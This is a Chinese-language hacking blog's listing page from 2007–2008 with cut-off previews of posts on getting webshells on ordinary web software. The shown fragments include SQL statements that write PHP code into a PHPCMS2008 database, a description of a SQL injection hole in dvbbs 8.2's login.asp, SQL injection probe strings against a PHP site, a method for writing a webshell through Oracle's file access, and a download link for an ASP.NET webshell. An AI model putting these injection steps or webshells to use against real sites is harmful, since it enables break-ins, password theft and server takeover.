popphen.net.ru
  • 1 
预览模式: 普通 | 列表

GET PHPCMS2008 WEBSHELL

作者:天晴无名氏 日期:2008-11-21 10:55

进去后
Create TABLE b (cmd text NOT NULL);           
Insert INTO b (cmd) VALUES('<?php&nbs

[阅读全文]

标签: PHPCMS WEBSHELL
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 3

dvbbs 8.2 论坛漏洞到webshell

作者:天晴无名氏 日期:2008-06-18 21:39

漏洞描述(具体引用原文如下):
中国应用最广泛的论坛程序,最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp
Login.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号,导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。
特别注意:admin等。。。必须在论

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 278

Char's ASP.NET Webshell V1.0正式版

作者:天晴无名氏 日期:2008-05-14 23:56

Char's ASP.NET Webshell V1.0 正式版

介绍:

此网页木马为Visual C# 2005编写,且发布目的仅供编程学习之用,请勿用于非法.

迅雷下载:thunder://QUFodHRwOi8vZHh4ejIwLmhhY2s1OC5jb206MzMyMi9oYWNrNTgvc2t5LzA4NTE0YWFzLnJhclpa
 
类别: Soft | 引用: 0 | 评论: 0 | 阅读: 153

ORACLE 本地读写文件---ORA WRITE WEBSHELL

作者:天晴无名氏 日期:2008-04-24 17:44

 
一般我们通过函数注射以后 获得ORA的DBA权限   那么我们就得对本地文件进行操作!

要是WEB跟ORA是同一个机器~那就更方便于我们拿更多的权限了~或者对本地写webshell

下面是采用ORA 自带的文件访问包 操作本地文件! 前提是你必须要知道WEBSITE的物理地址

以下是一个简单例子

--首先我们得先建立一个  ORACLE的目录对象

[阅读全文]

标签: WEBSHELL
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 233

Php手工注入+eWebEditor得到Webshell

作者:天晴无名氏 日期:2007-05-24 12:28

  废话不多说。切入正题。找到注入点
and 1=1
and 1=2
返回结果不同存在注入。
and ord(mid(version(),1,1))>51
返回正常。说明可以union。
order by  8
说明8个字段
以下是代码片段:

screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; " onclick="if(!this.resized) {return true;} else {windo

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 440
  • 1